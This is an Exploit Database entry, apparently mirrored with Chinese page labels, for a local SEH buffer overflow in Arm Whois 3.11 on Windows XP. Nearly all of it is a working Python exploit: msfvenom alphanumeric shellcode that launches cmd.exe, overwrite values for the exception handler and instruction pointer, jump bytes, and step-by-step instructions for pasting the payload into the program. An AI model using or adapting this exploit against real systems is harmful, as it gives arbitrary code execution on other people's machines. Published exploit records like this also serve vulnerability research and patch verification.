Arm Whois 3.11 – Buffer Overflow (SEH)

• Exploit Database
• 28 阅读

• 作者： Semen Alexandrovich Lyhin
  日期： 2018-11-06
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/45796/

• # Exploit Title: Arm Whois 3.11 - Buffer Overflow (SEH)
  # Date: 2018-11-05 
  # Exploit Author: Yair Rodríguez Aparicio (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit)
  # Vendor Homepage: http://www.armcode.com/
  # Software Link: http://www.armcode.com/downloads/arm-whois.exe
  # Version: 3.11
  # Tested on: Windows XP Proffesional Español SP3 x86 (PoC), Windows XP Proffesional English SP3 x86 (fully working)
   
  # HOWTO:
  # 1.- Run python code : python whois.py
  # 2.- Copy content to clipboard, from console or from file - text.txt 
  # 3.- Open whois.exe
  # 4.- Paste clipboard on "IP address or domain"
  # 5.- click on "Retrieves IP-adress info"
  # 6.- CMD is popped. 
  
  #max buffer lenght: 658. Badchars: a lot of. alpha_mixed + "\x89" works fine. 
  
  #msfvenom -p windows/exec CMD=cmd.exe -f py -e x86/alpha_mixed -b "\x89"
  #445
  buf =""
  buf += "\x54\x5d\xdb\xd5\xd9\x75\xf4\x59\x49\x49\x49\x49\x49"
  buf += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
  buf += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
  buf += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
  buf += "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x6b\x58\x4d\x52"
  buf += "\x33\x30\x75\x50\x35\x50\x31\x70\x4c\x49\x68\x65\x56"
  buf += "\x51\x39\x50\x70\x64\x4c\x4b\x32\x70\x36\x50\x4e\x6b"
  buf += "\x73\x62\x54\x4c\x4e\x6b\x72\x72\x62\x34\x4c\x4b\x54"
  buf += "\x32\x54\x68\x34\x4f\x6d\x67\x32\x6a\x77\x56\x46\x51"
  buf += "\x49\x6f\x6c\x6c\x47\x4c\x61\x71\x63\x4c\x63\x32\x54"
  buf += "\x6c\x61\x30\x59\x51\x7a\x6f\x66\x6d\x35\x51\x4a\x67"
  buf += "\x59\x72\x5a\x52\x33\x62\x30\x57\x4c\x4b\x50\x52\x64"
  buf += "\x50\x4c\x4b\x52\x6a\x77\x4c\x4c\x4b\x42\x6c\x46\x71"
  buf += "\x44\x38\x69\x73\x71\x58\x63\x31\x5a\x71\x73\x61\x4c"
  buf += "\x4b\x32\x79\x35\x70\x47\x71\x6b\x63\x4e\x6b\x32\x69"
  buf += "\x36\x78\x5a\x43\x45\x6a\x33\x79\x4e\x6b\x64\x74\x6c"
  buf += "\x4b\x77\x71\x7a\x76\x35\x61\x4b\x4f\x6e\x4c\x7a\x61"
  buf += "\x68\x4f\x64\x4d\x33\x31\x48\x47\x66\x58\x6d\x30\x53"
  buf += "\x45\x49\x66\x54\x43\x43\x4d\x58\x78\x65\x6b\x61\x6d"
  buf += "\x76\x44\x53\x45\x4d\x34\x50\x58\x4c\x4b\x42\x78\x74"
  buf += "\x64\x56\x61\x39\x43\x71\x76\x6c\x4b\x34\x4c\x52\x6b"
  buf += "\x4c\x4b\x32\x78\x55\x4c\x75\x51\x68\x53\x6e\x6b\x56"
  buf += "\x64\x6e\x6b\x65\x51\x78\x50\x6c\x49\x73\x74\x37\x54"
  buf += "\x47\x54\x61\x4b\x53\x6b\x53\x51\x71\x49\x73\x6a\x62"
  buf += "\x71\x6b\x4f\x4d\x30\x33\x6f\x43\x6f\x71\x4a\x6c\x4b"
  buf += "\x64\x52\x4a\x4b\x4e\x6d\x53\x6d\x31\x7a\x57\x71\x6c"
  buf += "\x4d\x4c\x45\x68\x32\x47\x70\x47\x70\x57\x70\x66\x30"
  buf += "\x75\x38\x56\x51\x6e\x6b\x70\x6f\x6d\x57\x39\x6f\x49"
  buf += "\x45\x6d\x6b\x4a\x50\x4e\x55\x69\x32\x50\x56\x73\x58"
  buf += "\x59\x36\x4c\x55\x6f\x4d\x6f\x6d\x6b\x4f\x48\x55\x67"
  buf += "\x4c\x45\x56\x63\x4c\x77\x7a\x4f\x70\x59\x6b\x4d\x30"
  buf += "\x30\x75\x57\x75\x4f\x4b\x37\x37\x42\x33\x70\x72\x62"
  buf += "\x4f\x63\x5a\x75\x50\x50\x53\x39\x6f\x4b\x65\x35\x33"
  buf += "\x50\x6d\x53\x54\x46\x4e\x30\x65\x62\x58\x53\x55\x75"
  buf += "\x50\x41\x41"
  
  shellcode = buf + "\x41"*(658-len(buf))
  EDX_BAD_OVERWRITE = "\x42"*4
  EIP = "\xC2\x34\x40"
  second_space = "\xe9\x65\xFD\xFF\xFF"+ "\x43"*3
  first_space = "\x43"*2 + "\xEB\xF2"
  
  buffer = "\x41\x41" + shellcode + EDX_BAD_OVERWRITE + second_space + first_space + EIP 
  print buffer
  f = open("text.txt", "w")
  f.write(buffer)
  f.close()